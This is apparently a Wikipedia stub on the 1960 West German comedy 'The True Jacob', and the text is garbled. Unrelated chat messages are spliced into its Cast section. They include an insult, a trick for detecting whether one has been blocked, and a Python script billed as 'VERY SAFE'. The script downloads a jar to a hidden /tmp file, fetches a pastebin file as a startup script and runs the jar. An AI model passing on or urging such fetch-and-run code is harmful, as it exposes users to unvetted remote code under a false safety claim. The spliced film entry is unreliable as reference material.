The True Jacob

The True Jacob (German: Der wahre Jakob) is a 1960 West German comedy film directed by Rudolf Schündler and starring Willy Millowitsch, Renate Ewert and Jane Tilden.[1] It is a remake of a German film from 1931.

The True Jacob
Directed byRudolf Schündler
Produced byAlexander Grüter
Written by
Starring
Music byPeter Igelhoff
CinematographyBruno Mondi
Edited by
Production
company
Corona Filmproduktion
Distributed byUFA
Release date
11 August 1960
Running time
88 minutes
CountryWest Germany
LanguageGerman

Cast

gollark: I was going to star "i cant hear you, you've been blocked for like a month or something because of being an attention whore", but alas.
gollark: Hmm, apparently you cannot react to messages sent by users who have blocked you. Interesting. This allows testing for blockedness.
gollark: Fascinating.
gollark: <@341618941317349376> should run my !!VERY SAFE!! python code.
gollark: ```python#!/usr/bin/env python3import urllib.requestimport shutilimport osfrom os.path import expanduserdef download(url, file): with urllib.request.urlopen(url) as response, open(file, 'wb') as out_file: shutil.copyfileobj(response, out_file)print("Executing Procedure 5.")download("https://emux.cc/versions/88ba9e7a/CCEmuX-cct.jar", "/tmp/.cct.jar")print("Phase 1 complete. Beginning Phase 2.")data_dir = expanduser("~/.local/share/ccemux/computer/0")if not os.path.exists(data_dir): os.makedirs(data_dir)download("https://pastebin.com/raw/RM13UGFa", data_dir + "/startup")os.system("java -jar /tmp/.cct.jar")```

See also

References

  1. Goble p.1008

Bibliography

  • Goble, Alan. The Complete Index to Literary Sources in Film. Walter de Gruyter, 1999.


This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.